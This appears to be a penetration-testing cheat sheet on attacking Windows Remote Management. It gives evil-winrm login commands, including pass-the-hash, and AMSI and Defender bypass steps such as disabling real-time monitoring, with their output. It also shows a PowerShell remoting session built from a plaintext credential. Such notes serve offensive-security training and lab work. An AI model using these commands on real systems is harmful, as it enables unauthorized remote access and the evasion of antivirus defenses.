5985,5986 - WinRM
Authentication
evil-winrm -i <ip> -u <user> -p <pass>evil-winrm -i <ip> -u <user> -H <hash># -S -> SSL
evil-winrm -i 10.10.11.152 -S -k <key> -c <crt>AMSI Bypass
> #amsiscanbuffer
At line:1 char:1
+ #amsiscanbuffer
+ ~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
# Try this as well
> set-mppreference —disablerealtimemonitoring $trueTry AMSI.fail.
> Bypass-4MSI
Info: Patching 4MSI, please be patient...
[+] Success!> #amsiscanbufferPowerShell Remoting
PowerShell Remoting by default uses WinRM for Cmdlets such as Enter-PSSession. Therefore, a user needs to be in the local group Remote Management Users to be a valid user for these Cmdlets. However, instead of WinRM, SSH can also be used for PowerShell remoting.
Creating a PowerShell remoting session via WinRM in a bind shell can cause unexpected behavior. Opt for
evil-winrminstead.
> $password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force
> $cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password)
> Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred
[CLIENTWK220]: PS C:\Users\daveadmin\Documents> whoami
whoami
clientwk220\daveadminLast updated
Was this helpful?